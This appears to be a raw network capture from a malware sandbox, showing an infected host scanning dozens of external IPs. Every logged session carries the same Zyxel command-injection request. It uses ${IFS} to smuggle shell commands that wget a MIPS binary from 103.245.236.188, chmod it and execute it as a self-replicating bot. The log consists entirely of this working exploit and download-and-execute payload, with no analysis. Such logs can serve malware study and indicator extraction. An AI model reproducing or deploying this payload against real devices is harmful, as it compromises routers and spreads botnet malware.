                                                Jan 12, 2024 18:24:51.231218100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8378192.168.2.1337132122.53.13.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231262922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8379192.168.2.134495681.221.84.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231296062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8380192.168.2.1349192133.237.215.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231317043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8381192.168.2.1336610103.206.252.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231364012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8382192.168.2.135938451.39.56.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231403112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8383192.168.2.1343198162.64.137.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231453896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8384192.168.2.134000844.212.137.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231487036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8385192.168.2.134022284.110.15.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231522083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8386192.168.2.1340682128.108.231.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231575966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8387192.168.2.1349546112.55.21.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231604099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8388192.168.2.134594265.225.209.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231647968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8389192.168.2.1339068160.153.207.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231699944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8390192.168.2.135013863.66.222.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231714964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8391192.168.2.1354896191.229.72.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231756926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8392192.168.2.1358354155.196.58.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231801987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8393192.168.2.1333266153.252.56.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231842995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8394192.168.2.135172441.55.88.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231879950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8395192.168.2.134467617.248.83.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231897116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8396192.168.2.1345890220.213.149.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231935024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8397192.168.2.1335012135.153.212.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.231959105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8398192.168.2.1345144197.169.15.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232033014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8399192.168.2.134241237.200.55.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232068062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8400192.168.2.134733496.130.138.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232094049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8401192.168.2.133492253.165.61.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232122898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8402192.168.2.1348384188.216.176.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232180119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8403192.168.2.134999437.179.108.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232233047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8404192.168.2.1339178105.51.226.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232259989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8405192.168.2.1350376159.78.64.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232290983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8406192.168.2.1358888119.255.192.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232331991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8407192.168.2.135624291.33.28.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232363939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8408192.168.2.134141227.5.38.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232414961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8409192.168.2.133839631.125.106.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232448101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8410192.168.2.134602852.195.166.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232470989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8411192.168.2.1340806192.229.161.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232522011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8412192.168.2.1360140183.236.43.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232556105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8413192.168.2.1356270124.132.206.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232575893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8414192.168.2.133730657.15.125.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232645988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8415192.168.2.136082838.92.102.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232678890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8416192.168.2.1347916187.224.187.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232728004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8417192.168.2.135458617.43.19.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232758999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8418192.168.2.1348068207.42.194.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232799053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8419192.168.2.1350090146.80.30.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232840061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8420192.168.2.1358908106.155.1.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232878923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8421192.168.2.1354198130.199.88.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232899904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8422192.168.2.1338006124.7.196.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.232961893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8423192.168.2.1339968223.145.57.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233004093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8424192.168.2.1344406173.108.232.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233026981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8425192.168.2.1334296150.233.253.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233087063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8426192.168.2.1359514145.184.156.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233114958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8427192.168.2.135669087.13.185.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233160973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8428192.168.2.1342820100.224.103.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233189106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8429192.168.2.13602328.111.248.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233242035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8430192.168.2.1354338125.203.71.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233273983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8431192.168.2.1341668213.206.30.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233311892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8432192.168.2.1340256159.5.190.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233342886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8433192.168.2.1338554153.76.129.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233376026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8434192.168.2.1347552169.173.78.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233436108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8435192.168.2.13347488.244.29.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233455896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8436192.168.2.135984023.25.40.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233521938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8437192.168.2.134632292.24.26.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233551025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8438192.168.2.134046219.165.74.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233577967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8439192.168.2.133697070.192.55.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.233613968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8440192.168.2.1337368128.171.113.129443
                                                TimestampBytes transferredDirectionData
